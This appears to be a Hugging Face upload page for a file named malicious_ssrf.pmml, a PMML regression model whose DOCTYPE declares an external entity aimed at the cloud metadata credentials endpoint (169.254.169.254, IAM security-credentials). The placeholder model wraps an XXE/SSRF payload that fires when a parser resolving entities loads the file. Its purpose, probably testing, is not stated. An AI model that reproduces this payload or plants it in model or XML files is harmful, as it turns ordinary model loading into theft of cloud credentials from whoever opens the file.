Upload malicious_ssrf.pmml with huggingface_hub
Browse files- malicious_ssrf.pmml +21 -0
malicious_ssrf.pmml
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
<?xml version="1.0" encoding="UTF-8"?>
|
| 2 |
+
<!DOCTYPE PMML [
|
| 3 |
+
<!ENTITY % oob SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
|
| 4 |
+
%oob;
|
| 5 |
+
]>
|
| 6 |
+
<PMML xmlns="http://www.dmg.org/PMML-4_4" version="4.4">
|
| 7 |
+
<Header description="xxe"/>
|
| 8 |
+
<DataDictionary>
|
| 9 |
+
<DataField name="x" optype="continuous" dataType="double"/>
|
| 10 |
+
<DataField name="y" optype="continuous" dataType="double"/>
|
| 11 |
+
</DataDictionary>
|
| 12 |
+
<RegressionModel modelName="test" functionName="regression">
|
| 13 |
+
<MiningSchema>
|
| 14 |
+
<MiningField name="x"/>
|
| 15 |
+
<MiningField name="y" usageType="target"/>
|
| 16 |
+
</MiningSchema>
|
| 17 |
+
<RegressionTable intercept="1.0">
|
| 18 |
+
<NumericPredictor name="x" coefficient="2.0"/>
|
| 19 |
+
</RegressionTable>
|
| 20 |
+
</RegressionModel>
|
| 21 |
+
</PMML>
|